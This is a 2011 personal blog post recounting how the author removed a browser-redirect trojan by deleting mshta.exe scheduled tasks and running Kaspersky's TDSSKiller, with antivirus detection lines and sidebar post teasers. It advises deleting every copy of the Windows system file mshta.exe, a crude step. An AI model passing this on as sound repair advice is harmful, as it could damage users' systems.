Tuesday, January 25, 2011

Browser Redirect Virus

So I had this virus that was redirecting my browsers, AVG, Spybot and MalwareBytes did not detect anything. After running Hijackthis, I noticed some scheduled tasks. When I checked my Task scheduler I notice 23 Scheduled tasks, that ran mshta.exe and some URL. I deleted all of these scheduled tasks,searched my C drive for mshta.exe and deleted all instances of it(may need to use Unlocker to do this).

Once I rebooted I ran AVG, Spybot and MalwareBytes again, AVG found 4 things and could not remove them:

"C:\WINDOWS\system32\svchost.exe (1652):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\system32\svchost.exe (1652)";"Trojan horse Agent_r.XJ";""
"C:\WINDOWS\explorer.exe (636):\memory_001a0000";"Trojan horse Agent_r.XJ";"Object is inaccessible."
"C:\WINDOWS\explorer.exe (636)";"Trojan horse Agent_r.XJ";""

After some google'ing I found someone recommending TDSSKiller from Kaspersky. So I ran this program and it found 2 threats and removed them with a reboot, healed my system completely, AVG scan confirmed this.


Download Link: http://support.kaspersky.com/downloads/utils/tdsskiller.zip
at
Labels: , , ,

No comments:

Post a Comment

Thanks for your input.

Subscribe to: Post Comments (Atom)

Personal Media Organizer: digiKam

Looking to replace cloud solutions such as Google Photo's, ACDSee and Adobe with an offline application that won't have your persona...

  • Hikvision TFTP Tool
    Hikvision TFTP Tool. I am uploading a copy here for my archival purposes. TFTP.zip ( tftpserv . exe) This was originally downloaded f...
  • Hikvision iVMS Linux
    Hikvision iVMS4200 software for linux systems. This was hosted on the Hikvision website as a BETA copy. I downloaded a copy before it was r...
  • Hikvision cURL Enable SSH
    Here is how to enable SSH on my Hikvision Camera using a cURL command, you can use it on the camera's as well. cURL Command: curl -...